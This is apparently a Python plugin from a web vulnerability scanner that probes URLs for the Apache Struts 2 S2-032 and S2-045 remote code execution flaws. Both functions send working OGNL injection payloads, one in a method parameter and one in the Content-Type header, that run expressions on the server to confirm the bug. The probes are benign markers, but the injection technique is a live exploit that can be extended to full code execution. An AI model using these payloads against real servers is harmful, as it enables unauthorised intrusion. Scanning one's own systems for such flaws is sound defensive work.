#!/usr/bin python
from plugins.config.config_package import *

keywords = [
    'CheckVul Success','CheckVul Failed','Server Connection Timeout'
]

class Struts(object):
    def st032(url):
        try:
            poc = 'ST032'
            header = {'user-agent': 'WebFox/0.0.1'}
            payload = {'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(#parameters.poc[0]),#writer.flush(),#writer.close': '', 'poc': poc}
            res = requests.get(url, headers=header,params=payload, timeout=2,verify=False)
            if res.status_code == 200 and poc in res.text:
                core.checksuc(target=url,name='Apache Struts 2-032',payload=None)
               
            else:
                pass
        except Exception as e:
            pass

    def st045(url):
        headers_payload = {
            "Content-Type":'${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("testpoc",233*233)}.multipart/form-data'
            }
        try:
            res = requests.get(url, headers=headers_payload, timeout=2, verify=False)
            testpoc = res.headers['testpoc']
            if testpoc == '54289':
                core.checksuc(target=url,name='Apache Struts 2-045',payload=None)
                
            else:
                pass
        except Exception as e:
            pass